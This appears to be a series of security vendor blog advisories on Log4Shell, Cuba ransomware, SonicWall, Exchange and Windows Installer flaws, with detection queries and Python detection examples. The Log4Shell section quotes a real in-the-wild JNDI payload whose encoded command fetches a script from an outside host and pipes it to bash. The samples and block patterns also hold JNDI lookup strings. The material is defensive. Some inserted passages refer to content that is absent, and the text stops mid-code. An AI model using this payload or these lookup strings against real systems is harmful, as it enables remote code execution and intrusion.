    Note: Blumira is not impacted by this vulnerability; our sensors do not utilize Java or Log4j at all, nor does our application infrastructure.



    Update 12/14 @ 9 AM ET: We discovered yesterday around 4PM ET that while Blumira’s application and ingestion were not impacted, one module was: the Elastic Logstash module. We confirmed that the RCE did not impact the version we were running, but it could have been vulnerable to DoS and resource exhaustion within the module.

    We patched, tested, and deployed the fixed version (1.2.0) by 5:45PM and notified all impacted customers of the vulnerability and fix. This amounted to updating ~1% of the sensors in use across the Blumira platform that had this version of Logstash. There was no evidence of exploitation within the organizations as none of these services were internet-facing.

    This finding further emphasizes the ubiquitous nature of the Log4j vulnerability and the importance of due diligence. As a security company, we believe it is our duty to lead by example and be transparent about our own security practices.

    Update 12/20 @ 9 AM ET: Updated to reflect our recommendation to update to Log4j 2.17.0 due to vulnerabilities in prior versions.

    What Happened?

    A remote code execution (RCE) zero-day vulnerability (CVE-2021-44228) was discovered in Apache Log4j, a widely-used Java logging library, and enables threat actors to take full control of servers without authentication.

    The vulnerability was publicly disclosed via GitHub on December 9, 2021. Versions 2.0 through 2.14.1 of Apache Log4j are impacted. Java Development Kit (JDK) versions 6u211, 7u201, 8u191 and 11.0.1 are not affected, according to LunaSec.

    LunaSec has put out a great blog post detailing how this vulnerability has evolved over the last day, which is worth a read.

    Log4j log output allows for the inclusion of variables that make Java logging more robust and verbose for local environments. This was added for “convenience,” as the originating pull request from 2013, which introduced this vulnerability, indicates.

    However, this also enables attackers to call external Java libraries via ${jndi:ldap:// and ${jndi:ldaps://, opening up the opportunity to drop shells without much additional effort. Additionally, threat actors can leverage ${jndi:rmi:// to execute commands within the actual environment to deploy the RCE attack and drop shells.

    Minecraft was the first application known to be affected by this vulnerability, but due to the ubiquity of the Java logging library, it won’t be the last. Cloud applications such as Steam and Apple iCloud have already proven to be vulnerable.

    Threat actors have already exploited this zero-day in the wild, according to CERT New Zealand.

    How Bad is This?

    Log4j is an incredibly common Java logging utility that is found in a large portion of Java applications. Because of the nature of this vulnerability, we expect this to persist in environments for months to years, similar to Shellshock. To successfully execute an attack, a threat actor only needs to control a string that is logged out by a Java application that uses Log4j. No authentication is required to take advantage of this vulnerability.

    Right now we are seeing attackers start to leverage the User Agent, URI Paths, and field POSTs largely as attack vectors into environments but expect this to evolve over time. Due to the ease of exploitation, we expect that these attacks will be added to a part of the normal offensive toolkit and therefore should be remediated as soon as possible.

    We expect threat actors to use this vulnerability as a new entry point to test whether they can access an environment. Through scanning, it is relatively easy for an attacker to drop the exploit in many different areas. Below is an example of an actual scan and exploit that we are now seeing land across environments contained in the User Agent of a request. This is derived from an already existing JNDI Exploit kit, which is now utilizing this new JNDI entry point via Log4j https://github.com/feihong-cs/JNDIExploit (now unavailable).

    ${jndi:ldap://45(.)155(.)205(.)233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMC4zNy4xMzcuMzM6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMjAuMzcuMTM3LjMzOjgwKXxiYXNo}

    At a high level, here are some takeaways regarding the severity of this zero-day:

    • For the most part, only crypto miners are scanning for this vulnerability right now but this is likely to change in the future.
    • Firewalls and VPNs will likely be affected once their developers catch up with the news.
    • Citrix applications are likely to be impacted, since many Citrix apps are written in Java.
    • This vulnerability is going to have a long tail, because in many cases if it’s in someone’s own stack, they likely have to update Java as well, which is a big lift.
    • The mitigation is probably only temporary as threat actors find new ways to utilize JNDI exploitation.

    What Should I Do?

    You can determine whether you were impacted by looking in your log files for services that use the affected Log4j versions (between versions 2.0 and 2.14.1). If those log files contain user-controlled strings (for example, jndi:ldap), then they could be impacted.

    We’ve also developed a vulnerability scanner to determine whether your systems are impacted, which is on GitHub.

    However, all Log4j users should immediately upgrade to Log4j 2.17.0.

    To mitigate the vulnerability, users should apply -Dlog4j2.formatMsgNoLookups=true to the JVM command for starting the application.

    It is important to note that you likely utilize Log4j across a large number of your toolsets and are unaware of it. Over the coming days you will see vendors quickly release patches and they must be applied as soon as possible. However some applications will either never be patched or will just be missed through the nature of scope. In those situations you will want to ensure that you are blocking potentially dangerous traffic through proper segmentation.

    If you have a firewall that can perform inspection and blocking based off of the User Agent and request path, you can potentially mitigate this attack.

    For example, in Palo Alto you can create a custom Vulnerability Signature > Signatures > Add > Transaction > Add And Condition. In the Condition, change Operator to Pattern Match, Context to http-req-headers, and set Pattern to \$\{jndi:(ldap|rmi|dns|nis|iiop|corba|nds|http), then block this custom Vulnerability signature to ensure no exploitation can occur.

    These attacks are largely being inserted into the User Agent by scan and exploit kits right now but can also occur through any open fields that could be logged out, e.g., Usernames in login fields or Paths in the actual requests.

    Update 12/14 @ 9 AM ET: We discovered a technique that could impact vulnerable services even if they are not exposed, as long as localhost has access to them. You should patch all non-exposed services as well.

    How To Detect

    To detect exploits of CVE-2021-44228 in the wild, look out for the following Indicators of Compromise, which we’ve published on GitHub.

    The good news is that Log4Shell is relatively easy to detect with string-based detection (see below):

    It is also possible to detect through outbound lightweight directory access protocol (LDAP), although we are seeing random ports being applied to attacks in the wild which may mitigate this. If you can do app-specific outbound detection, you may have better fidelity in the detection effort.

    Additionally, as we have seen patterns of use from the Exploit Kit https://github.com/feihong-cs/JNDIExploit, you can perform pattern detection within the User Agent and other attacker-manipulated fields with (Basic\/(DnsLog|Command|ReverseShell|Tomcat|Spring|Weblogic|Jetty|Websphere)|Deserialization\/|TomcatBypass|GroovyBypass|WebsphereBypass)
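    The two patterns above applied to web server logs, as an added Python example that is not Blumira's code: it parses Apache combined-format lines and checks the path, referer and User Agent fields, with the "jdni" typo in the firewall pattern corrected and ldaps added. The log lines, the documentation-range addresses and the host name attacker.example are constructed.

```python
import re

# Apache "combined" access log line: client IP, identity, user, timestamp,
# request line, status, size, referer and user agent.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Literal JNDI lookup pattern from the firewall guidance above (typo corrected
# to "jndi", "ldaps" added). Only the un-obfuscated form is matched.
JNDI_LOOKUP_RE = re.compile(
    r"\$\{jndi:(ldap|ldaps|rmi|dns|nis|iiop|corba|nds|http)", re.IGNORECASE
)

# URL path fragments used by the JNDIExploit kit, as listed above.
JNDIEXPLOIT_RE = re.compile(
    r"(Basic/(DnsLog|Command|ReverseShell|Tomcat|Spring|Weblogic|Jetty|Websphere)"
    r"|Deserialization/|TomcatBypass|GroovyBypass|WebsphereBypass)"
)

INDICATORS = [("jndi_lookup", JNDI_LOOKUP_RE), ("jndiexploit_path", JNDIEXPLOIT_RE)]

# Constructed sample log. 203.0.113.0/24, 198.51.100.0/24 and attacker.example
# are placeholders, and the base64 payload "aWQ=" is just "id"; nothing here
# is a real indicator.
SAMPLE_LOG = (
    '203.0.113.10 - - [10/Dec/2021:14:02:11 +0000] "GET /login HTTP/1.1" 200 512 '
    '"-" "${jndi:ldap://attacker.example:1389/Basic/Command/Base64/aWQ=}"\n'
    '203.0.113.11 - - [10/Dec/2021:14:02:15 +0000] '
    '"GET /${jndi:rmi://attacker.example:1099/TomcatBypass/Command/Base64/aWQ=} HTTP/1.1" '
    '404 210 "-" "Mozilla/5.0"\n'
    '198.51.100.7 - - [10/Dec/2021:14:03:01 +0000] "POST /api/search HTTP/1.1" 200 1024 '
    '"-" "Mozilla/5.0"\n'
)


def scan_access_log(text):
    """Return (line_no, src_ip, field, indicator) for every logged field that
    matches one of the patterns. Lines that do not parse are skipped; a
    production rule should count those separately rather than ignore them."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = LINE_RE.match(line)
        if not m:
            continue
        # Any logged field can carry the lookup string, not just the User Agent.
        for field in ("path", "referer", "agent"):
            value = m.group(field)
            for name, pattern in INDICATORS:
                if pattern.search(value):
                    findings.append((line_no, m.group("ip"), field, name))
    return findings


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

    This matches only the literal ${jndi: form, so treat it as a first-pass filter rather than a complete detection.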

    You can also apply an unofficial patch, Log4Patch, created by AWS security engineer Volker Simonis, that injects a Java agent into a running JVM process.

    How Blumira Can Help

    At Blumira we’ve developed a global search for exploit attempts. The search tool uses web server logs (Apache|Nginx|IIS) to look for exploit attempts in the User Agent String, which is used by one of the POCs. Blumira customers can access this in the customer portal.

    Non-Blumira customers with SSH access to a Linux server can enter this search into their own tools using this logic: https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b#log4j-rce-exploitation-detection

    Blumira’s cloud SIEM detects and alerts you about suspicious behavior in your environment so that you can stop an incident early enough to prevent damage. Each finding we send is accompanied with a security playbook, giving you clear recommendations on how to remediate an attack. Our support team of security analysts is always available to answer questions on how to interpret a finding, or for other security help.

    Blumira’s free trial is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.

    Learn More About Log4Shell

    To learn more about Log4Shell, watch our recorded livestream:

    Low
    December 9, 2021

    How To Detect Signs of Cuba Ransomware

    The Cuba ransomware group has compromised 48 U.S. critical infrastructure organizations in the financial, government, healthcare, manufacturing and information technology industries and cashed out with at least $43.9 million in payments, according to a recent FBI flash alert.

    Ransomware

    To know what to look for, it’s important to understand the methods that the Cuba variant uses to compromise victim systems and respond early enough to stop an attack in progress.

    How To Detect Initial Compromise

    Cuba ransomware is distributed through Hancitor malware that drops or executes Remote Access Trojans (RATs) onto victim networks. To gain initial access, they use the following methods:

    • Phishing emails – Threat actors send these types of emails to trick users into clicking on malicious links or opening malicious attachments.
    • Stolen credentials – Attackers leverage the credential-dumping tool Mimikatz to steal passwords, hashes, PINs and more from memory on Windows to escalate privileges. Most security information and event management (SIEM) platforms can detect the presence of Mimikatz on a network.
    • Microsoft Exchange vulnerabilities – The Cuba ransomware group uses several vulnerabilities affecting Exchange servers in targeted attacks in the wild. Microsoft has released security updates for them and recommends patching immediately to protect your environment. Learn how Blumira helped a customer evade a real-life Exchange attack.
    • Remote Desktop Protocol (RDP) – Commonly used for remote access to Windows machines, RDP is a top attack vector if left open to connections from the public internet. Attackers brute-force or steal RDP credentials to gain initial access to systems. If you need to use RDP, make sure that you adhere to best practices to secure RDP, like ensuring that its traffic flows through a VPN connection protected by multi-factor authentication.

    Detect Attacker Communications & Ransomware Distribution

    After gaining initial access using any number of methods listed above, the threat actors will then use certain tools and techniques to communicate to their command and control servers, as well as distribute malicious software, including:

    • Cobalt Strike Beacon – Cuba ransomware will install and execute a Cobalt Strike Beacon as a service on a victim’s network via PowerShell. Cobalt Strike Beacon sends and receives encrypted commands to a command and control (also known as C2 or C&C) server controlled by the attacker, which can include instructions to download malware. This is part of a post-exploitation framework intended for use by penetration testers, but also abused by criminals.
    • PowerShell, PsExec – Threat actors will use legitimate Windows services and administrative privileges to deploy ransomware payloads remotely and encrypt their victims’ files using the .cuba extension, according to the FBI alert. PowerShell is a Windows command-line interface and scripting environment used to automate management tasks. But threat actors also abuse PowerShell to execute code and discover information in your Windows environment. These types of attacks are harder to detect since they use built-in administrative tools to accomplish the end goal. Learn more about Blumira’s latest PowerShell detections.

    Automate Attacker Detection For Faster Response

    As we get closer to the holidays, it’s important to note that ransomware actors often strike during company off-times, such as weekends and holidays. Keeping vigilant during these times can be made easier by automating your threat hunting so you can detect indicators of an attack outside of typical working human hours.

    Monitoring your environment for signs of this type of activity can be time-consuming and difficult for small IT teams, operating without an in-house security operations center (SOC). As a SOC alternative, Blumira’s platform is designed to automatically identify attacker behaviors (including all of the methods listed above), then notify you and provide playbooks to respond to these indicators of a potential attack in progress. For urgent priority issues, Blumira’s responsive and experienced security operations team is on standby 24/7 to guide you through incident response procedures.

    Early detection is key to stopping a ransomware attack from widespread damage to your business. Learn more about Ransomware Prevention & Detection with Blumira.

    Medium
    December 9, 2021

    Critical Bugs Discovered In SonicWall SMA 100 Series Appliances

    What Happened?

    Multiple bugs were discovered in SonicWall’s Secure Mobile Access (SMA) 100 Series VPN appliances. These bugs range from medium to critical, with more severe flaws enabling an unauthenticated user to execute code as a “nobody” user.

    These vulnerabilities affect SonicWall SMA 200, 210, 400, 410, and 500v appliances even with the web application firewall (WAF) enabled. The SMA 100 Series is intended to provide secure access to data center, cloud, and SaaS resources from a single portal.

    A summary of the discovered bugs is below:

    CVE            | Description                                                                        | CVSS Score | Who Reported It?
    CVE-2021-20038 | Unauthenticated Stack-based Buffer Overflow                                        | 9.8 High   | Rapid7
    CVE-2021-20039 | Authenticated Command Injection Vulnerability as Root                              | 7.2 High   | Rapid7
    CVE-2021-20040 | Unauthenticated File Upload Path Traversal Vulnerability                           | 6.5 Medium | Rapid7, NCCGroup
    CVE-2021-20041 | Unauthenticated CPU Exhaustion Vulnerability                                       | 7.5 High   | Rapid7
    CVE-2021-20042 | Unauthenticated “Confused Deputy” Vulnerability                                    | 6.3 Medium | Rapid7
    CVE-2021-20043 | getBookmarks Heap-based Buffer Overflow                                            | 8.8 High   | NCCGroup
    CVE-2021-20044 | Post-Authentication Remote Code Execution (RCE)                                    | 7.2 High   | NCCGroup
    CVE-2021-20045 | Multiple Unauthenticated File Explorer Heap-based and Stack-based Buffer Overflows | 9.4 High   | NCCGroup


    How Bad is This?

    There are multiple bugs in the SonicWall SMA 100 series appliances, ranging in severity. Less severe bugs enable threat actors to upload files to a directory on the appliance after exploiting the bug. While there are no public exploits available yet for these bugs, it is only a matter of time until there are.

    In April 2021, there were reports of a ransomware variant FiveHands using a vulnerability in the SMA product to deploy attacks.

    However the more noteworthy bugs, which include CVE-2021-20038, CVE-2021-20039 and CVE-2021-20045, have serious consequences.

    The most severe is CVE-2021-20038, which was rated a CVSS score of 9.8 and enables a threat actor to enter as root and perform actions such as enabling and disabling security policies and access privileges. CVE-2021-20045 is similar to CVE-2021-20038 in that it is a group of heap- and stack-based buffer overflow bugs that allow remote code execution (RCE) as root.

    CVE-2021-20039 is perhaps the most dangerous if left unpatched because it enables an authenticated threat actor to take over remote devices by injecting arbitrary commands as a root user.

    What Should I Do?

    We recommend that you immediately update your SMA 100 appliances with the most recent patch. There have been reports of this patch causing issues with registration after it is applied, so we recommend backing up and saving your configuration prior to patching.

    If you cannot patch, you should disable access from the internet to your SMA 100 until you can.

    How Blumira Can Help

    Blumira detects and alerts you about suspicious behavior in your environment so that you can stop an incident early enough to prevent damage. Each finding we send is accompanied with a security playbook, giving you clear recommendations on how to remediate an attack. Our support team of security analysts is always available to answer questions on how to interpret a finding, or for other security help.

    Blumira’s free trial is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.

    Sign up for a free trial to start detecting and mitigating exposure related to VPN vulnerabilities.

    Low
    November 29, 2021

    Malware Trends To Expect In 2022

    Malware in 2021 was more sophisticated and evasive than ever before. We saw the growth of ransomware-as-a-service, the emergence of fake software updates, and the resurfacing of Emotet.

    What will 2022 bring? To protect your organization in the new year, it’s good to have some idea of what lurks around the corner — as well as security best practices that will keep you covered against the most elusive types of malware.

    No one has a crystal ball, but security experts Aviv Grafi, CTO and Co-Founder of Votiro, and Matthew Warner, CTO and Co-Founder of Blumira, will share predictions of the malware landscape in 2022 based on real data and on-the-ground experiences.

    They’ll discuss:

    • How evasion techniques might evolve in 2022
    • Best practices to keep you ahead of the malware curve — no matter what your team size or budget
    • Is Emotet malware here to stay in 2022?

    This interactive, conversational-style session encourages questions and engagement with viewers – so sign up today for access to our security experts.

    Participants

    Matthew Warner, CTO and Co-Founder, Blumira

    Matt is CTO and Co-Founder of Blumira, a leading cybersecurity provider of automated threat detection and response technology. At Blumira, he leads the security and engineering efforts to provide actionable insights into cybersecurity risks at scale. Matt has over 10 years of experience in IT and development, focusing on business strategy, development, compliance, threat detection and penetration testing. Previously, he was Director of Security Services, Development & Security at NetWorks Group, responsible for defensive information security and services.

    Aviv Grafi, CTO and Co-Founder, Votiro

    Aviv Grafi is CTO & Founder of Votiro, an award-winning cybersecurity company specializing in sanitizing files of all kinds through Votiro’s Secure File Gateway solutions. Prior to co-founding Votiro, Aviv served in an elite intelligence unit of the IDF, nurturing his passion for finding simple solutions to complex security issues. Aviv's areas of expertise span the cyber product lifecycle—from strategy and development, through go-to market—along with network security, IDS/IPS/firewall internals, defensive programming, enterprise security penetration testing, vulnerability research, and virtualization.

    Critical
    November 23, 2021

    CVE-2021-42321: Microsoft Exchange RCE Vulnerability

    CVE
    Microsoft Security

    What Happened

    Security researcher Janggggg (@testanull on Twitter) published a proof-of-concept exploit for CVE-2021-42321, a remote code execution (RCE) vulnerability in Microsoft Exchange that affects on-premises servers running Microsoft Exchange 2016 and 2019, including those using Exchange Hybrid mode.

    This exploit enables authenticated threat actors to execute code remotely on vulnerable servers and launch an attack.

    Microsoft’s November 2021 Patch Tuesday addresses the vulnerability, so administrators should patch immediately.

    How Bad is This?

    A remote code execution vulnerability is always severe because it enables potential threat actors to launch attacks without local access to a machine. Microsoft issued a base metric score of 8.8, which notes high severity.

    This vulnerability is essentially a bug in how Exchange allowed certain data to be stored in the BinaryData section of a UserConfiguration on a folder. When a UserConfiguration is set with a payload in the BinaryData and the attacker then requests a ClientAccessToken, a deserialization bug is triggered that results in execution of the payload in BinaryData.

    Fortunately, Microsoft’s November patch will mitigate the risk. Plus, threat actors must be authenticated users to take advantage of the bug.

    What Should I Do?

    Administrators should immediately install the patches issued in Microsoft’s November Patch Tuesday.

    Admins running Exchange servers should also check to see if attackers have attempted to exploit them. Admins can run the following PowerShell query on each server to check for specific events in the Event Log, according to Bleeping Computer:

    Get-EventLog -LogName Application -Source "MSExchange Common" -EntryType Error | Where-Object { $_.Message -like "*BinaryFormatter.Deserialize*" }

    How To Detect

    In the end, this vulnerability and attack do not differ much from previous attacks in 2021. The attack itself has a set number of steps that must be run as an authenticated user: update specific configurations on that user, and then execute the actual vulnerability against the host itself.

    This PoC attack requires execution of 4 POSTs in a chain against Exchange with an authenticated user to be successful. It is possible to detect this attack using the following logic, although it may have false positives without some tuning in your environment.

    4 POSTs to /ews/exchange.asmx on IIS from a public IP with User-Agent ExchangeServicesClient/15.01.2308.008 over a short period of time. This detection will depend heavily on the User Agents seen in your environment and may result in false positives:

    src_ip = <Public IP>
    AND agent="ExchangeServicesClient/15.01.2308.008"
    AND url="/EWS/Exchange.asmx"
    AND method="POST"
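    The 4-POST logic above as an added Python example (not Blumira's code or search syntax): it keeps only EWS POSTs carrying the PoC User-Agent from non-internal sources, groups them by source address and applies a sliding time window. The internal address ranges, the 60-second window and the sample requests are assumptions constructed for the example.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

# Address ranges treated as internal; any other source counts as the
# "Public IP" in the logic above. Adjust to your own address plan.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16",
)]
POC_AGENT = "ExchangeServicesClient/15.01.2308.008"
EWS_URL = "/ews/exchange.asmx"


def is_public(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def find_ews_post_bursts(requests, threshold=4, window_seconds=60, agent=POC_AGENT):
    """Collect POSTs to EWS carrying the PoC User-Agent from public sources,
    then report every source with at least `threshold` of them inside a
    sliding window of `window_seconds`. Returns (src_ip, first_timestamp)."""
    per_ip = defaultdict(list)
    for r in requests:
        if r["method"].upper() != "POST" or r["url"].lower() != EWS_URL:
            continue
        if r["agent"] != agent or not is_public(r["src_ip"]):
            continue
        per_ip[r["src_ip"]].append(datetime.fromisoformat(r["ts"]))

    window = timedelta(seconds=window_seconds)
    hits = []
    for ip, times in per_ip.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                hits.append((ip, times[i].isoformat()))
                break  # one alert per source is enough
    return hits


def _req(ts, ip, method="POST", url="/EWS/Exchange.asmx", agent=POC_AGENT):
    return {"ts": ts, "src_ip": ip, "method": method, "url": url, "agent": agent}


# Constructed IIS requests already parsed into fields (UTC timestamps).
# 203.0.113.0/24 is a documentation range standing in for external addresses.
SAMPLE_REQUESTS = [
    # Four chained POSTs in seven seconds from outside: the PoC's shape.
    _req("2021-11-22T10:00:01", "203.0.113.5"),
    _req("2021-11-22T10:00:03", "203.0.113.5"),
    _req("2021-11-22T10:00:05", "203.0.113.5"),
    _req("2021-11-22T10:00:08", "203.0.113.5"),
    # Same shape from an internal client: dropped by the public-IP filter.
    _req("2021-11-22T10:01:00", "10.0.0.5"),
    _req("2021-11-22T10:01:01", "10.0.0.5"),
    _req("2021-11-22T10:01:02", "10.0.0.5"),
    _req("2021-11-22T10:01:03", "10.0.0.5"),
    # External source with a browser User-Agent: dropped by the agent filter.
    _req("2021-11-22T10:02:00", "203.0.113.9", agent="Mozilla/5.0"),
    _req("2021-11-22T10:02:01", "203.0.113.9", agent="Mozilla/5.0"),
    _req("2021-11-22T10:02:02", "203.0.113.9", agent="Mozilla/5.0"),
    _req("2021-11-22T10:02:03", "203.0.113.9", agent="Mozilla/5.0"),
    # Only three matching POSTs: below the threshold.
    _req("2021-11-22T10:03:00", "203.0.113.20"),
    _req("2021-11-22T10:03:01", "203.0.113.20"),
    _req("2021-11-22T10:03:02", "203.0.113.20"),
    # Four matching POSTs spread over six minutes: outside a 60-second window.
    _req("2021-11-22T10:04:00", "203.0.113.30"),
    _req("2021-11-22T10:06:00", "203.0.113.30"),
    _req("2021-11-22T10:08:00", "203.0.113.30"),
    _req("2021-11-22T10:10:00", "203.0.113.30"),
]

if __name__ == "__main__":
    print(find_ews_post_bursts(SAMPLE_REQUESTS))
```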

    Otherwise Blumira recommends using Sysmon to detect this the same way as other Exchange vulnerabilities. By their nature, they require the IIS/Exchange service w3wp.exe to be leveraged to pivot into another process. In these situations we expect to see patterns in Sysmon process creation events such as:

    user LIKE "%DefaultAppPool%"
    AND parent_process_name LIKE "%w3wp.exe%"
    AND process_name LIKE "%cmd%"

    This will tell you whenever your w3wp (IIS) service is spawning command shells and/or similar processes within the process_name, depending on the pivot you’re attempting to identify.
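    An added Python example (not Blumira's detection code) that evaluates both the w3wp.exe rule above and the java.exe parent-process rule from the Log4j WebSocket article against constructed Sysmon Event ID 1 records. The build-tool command-line allowlist is an assumption, included to show how the noisy java.exe rule can be tuned without weakening it.

```python
import re

# Constructed Sysmon Event ID 1 (process creation) records, flattened into the
# field names used in the detection logic above. Users, paths and command
# lines are made up for this example.
SAMPLE_EVENTS = [
    {"user": "CORP\\devuser",
     "parent_process_name": "C:\\Program Files\\Java\\jdk-11\\bin\\java.exe",
     "process_name": "C:\\Windows\\System32\\cmd.exe",
     "command_line": "cmd.exe /c calc.exe"},
    {"user": "CORP\\devuser",
     "parent_process_name": "C:\\Program Files\\Java\\jdk-11\\bin\\java.exe",
     "process_name": "C:\\Windows\\System32\\cmd.exe",
     "command_line": "cmd.exe /c gradlew.bat build"},
    {"user": "IIS APPPOOL\\DefaultAppPool",
     "parent_process_name": "C:\\Windows\\System32\\inetsrv\\w3wp.exe",
     "process_name": "C:\\Windows\\System32\\cmd.exe",
     "command_line": "cmd.exe /c whoami"},
    {"user": "IIS APPPOOL\\DefaultAppPool",
     "parent_process_name": "C:\\Windows\\System32\\inetsrv\\w3wp.exe",
     "process_name": "C:\\Windows\\System32\\conhost.exe",
     "command_line": "conhost.exe 0x4"},
    {"user": "CORP\\devuser",
     "parent_process_name": "C:\\Windows\\explorer.exe",
     "process_name": "C:\\Windows\\System32\\cmd.exe",
     "command_line": "cmd.exe"},
]

# Rule = (name, parent image regex, child image regex, user regex or None,
# allowlisted command-line regexes). "(^|\\)" anchors to the image file name;
# all matching is case-insensitive.
RULES = [
    # java.exe spawning a shell (Log4j). Noisy on developer machines, so known
    # build tooling is allowlisted by command line (assumed list).
    ("log4j_java_spawns_shell",
     r"(^|\\)java\.exe$", r"(^|\\)(cmd|powershell)\.exe$", None,
     [r"gradlew(\.bat)?\b", r"mvnw?(\.cmd)?\b"]),
    # IIS worker process under DefaultAppPool spawning cmd (Exchange pivot).
    ("exchange_w3wp_spawns_cmd",
     r"(^|\\)w3wp\.exe$", r"cmd", r"DefaultAppPool", []),
]


def _search(pattern, value):
    return re.search(pattern, value, re.IGNORECASE) is not None


def match_rules(events, rules=RULES):
    """Return (rule_name, user, command_line) for every event that satisfies a
    rule's parent/child/user conditions and is not excused by its allowlist."""
    hits = []
    for ev in events:
        for name, parent_re, child_re, user_re, allowlist in rules:
            if not _search(parent_re, ev["parent_process_name"]):
                continue
            if not _search(child_re, ev["process_name"]):
                continue
            if user_re is not None and not _search(user_re, ev["user"]):
                continue
            if any(_search(a, ev["command_line"]) for a in allowlist):
                continue
            hits.append((name, ev["user"], ev["command_line"]))
    return hits


if __name__ == "__main__":
    for hit in match_rules(SAMPLE_EVENTS):
        print(hit)
```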

    How Blumira Can Help

    It’s nearly impossible for admins to track every vulnerability, but Blumira’s security experts perform threat hunting on your behalf and develop detections in real time to protect your environment. Blumira can detect activity related to Microsoft Exchange exploits, as well as many other security incidents.

    Blumira’s free trial is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.

    Sign up for a free trial to start detecting and mitigating exposure related to Windows vulnerabilities.

    Learn More In Our Livestream

    Dealing with yet another Microsoft vulnerability before a holiday weekend is frustrating, but Blumira’s security experts can help.

    Watch our livestream with Blumira’s Matthew Warner, CTO and Co-Founder, to get your questions answered before you sign off for the holiday.

    Critical
    November 23, 2021

    Zero-Day Windows Vulnerability for Admin Rights

    Microsoft Security

    What Happened?

    Security researcher Abdelhamid Naceri discovered a privilege escalation vulnerability in Microsoft Windows that can give admin rights to threat actors.

    The vulnerability was discovered when Microsoft released a patch for CVE-2021-41379 (Windows Installer Elevation of Privilege Vulnerability) as a part of the November 2021 Patch Tuesday. Naceri found a bypass to the patch, as well as a more severe zero-day privilege escalation vulnerability, and published a proof-of-concept exploit for the zero-day on GitHub.

    This zero-day vulnerability affects all supported client and server versions of Windows, including Windows 10, Windows 11 and Windows Server — even with the latest patches.

    How Bad is This?

    Pretty bad; privilege elevation is a serious situation, especially when threat actors could elevate from user to admin rights. Throughout 2021 we have seen a growing number of privilege escalation vulnerabilities land on Windows, which is only increasing the attack surface in environments at this point.

    There are no workarounds currently available, according to Naceri. Because this vulnerability and exploit leverage existing MSI functionality, it is inherently difficult to work around.

    The good news is that a threat actor would need local access to the machine to take advantage of this vulnerability. More good news is that Windows Defender detects the PoC.

    What Should I Do?

    Organizations that haven’t already enabled Sysmon in their environment should do so. Blumira’s newly-created PowerShell script, Poshim, streamlines Windows log collection by automatically installing and configuring NXLog and Sysmon to ship logs over Sysmon to a targeted IP.

    0patch, a micropatching service, released unofficial patches for the following affected Windows versions:

    1. Windows 10 v21H1 (32 & 64 bit) updated with November 2021 Updates
    2. Windows 10 v20H2 (32 & 64 bit) updated with November 2021 Updates
    3. Windows 10 v2004 (32 & 64 bit) updated with November 2021 Updates
    4. Windows 10 v1909 (32 & 64 bit) updated with November 2021 Updates
    5. Windows 10 v1903 (32 & 64 bit) updated with November 2021 Updates
    6. Windows 10 v1809 (32 & 64 bit) updated with May 2021 Updates

    Windows 10 21H2 is affected, too, but is not yet supported by 0patch.

    To install the patch, you must register for an 0patch account and install an 0patch agent through their website. Installing the agent will cause the patch to automatically download. While micropatching is a new method for prevention, it is generally safe to utilize on endpoints that could be impacted. We recommend testing the 0patch micropatches on your test machines like you would test normal Windows patches previous to full patch release.

    Additionally, admins can use an endpoint solution and a security information and event management (SIEM) platform to detect signs of the PoC exploit in an environment.

    How To Detect

    This PoC code is easily detectable in its current form due to a built-in MSI (or installer package) and the fact that the PoC has a number of hard-coded naming conventions.

    Blumira security experts tested the exploit in their lab environment and found a few ways to detect the PoC:

    Sysmon

    With Sysmon enabled, admins can look for the following behaviors:

    windows_event_id = 11
    AND target LIKE '%microsoft plz%'

    By default the PoC utilizes a target with “microsoft plz” in the path; this allows for quick detection opportunities for lazy attackers.

    AND

    process_name = 'C:\\Windows\\system32\\msiexec.exe'
    AND target LIKE '%AppData%splwow64.exe'
    AND windows_event_id in (11,26)

    The second Sysmon detection keys on the PoC writing splwow64.exe into its own AppData folder, which it creates and then deletes during the process.

    Windows logs

    Admins can look for the following Windows logs in Event Log Viewer:

    windows_log_name='Application'
    AND message LIKE '%test pkg%'

    This matches Application log entries that contain the hardcoded “test pkg” string, similar to “microsoft plz” above. Attackers building their own exploits will not use this naming convention, however.

    AND

    REGEXP_CONTAINS(message, r'Users.*AppData\\Local\\Temp\\2\\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\}.msi')
    AND user='SYSTEM'
    AND user_id='S-1-5-18'
    AND windows_event_id=1042

    On the failed MSI install, the Application log entry is written as the SYSTEM user (SID S-1-5-18) but references the initiating user’s AppData path. The message details Blumira sees are shown in the blob below. So far in our testing, we were able to reduce false positives by looking for the specific UUID4 format this MSI installer uses when it activates, but this may still result in noise at times.

    Final stage of attack shows the completion of the installer transaction as SYSTEM with a reference to the initializing user.

    Application Eventlog

    Search for EventID 1033 and the keyword ‘test pkg’
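The four queries above, written as an added Python example (not Blumira’s own detection code) and run over constructed Sysmon and Application events; the field names follow the queries, and the sample events and their evt-N ids are made up for this illustration:

```python
"""Detection rules from this post as Python predicates, run over constructed Sysmon/Application events."""
import re

SYSMON_FILE_CREATE = 11   # Sysmon Event ID 11: FileCreate
SYSMON_FILE_DELETE = 26   # Sysmon Event ID 26: FileDeleteDetected
MSIEXEC = r"c:\windows\system32\msiexec.exe"

# The post's regex with the trailing '.' escaped so only a literal ".msi" matches;
# note it accepts any GUID-shaped name, not strictly UUID4.
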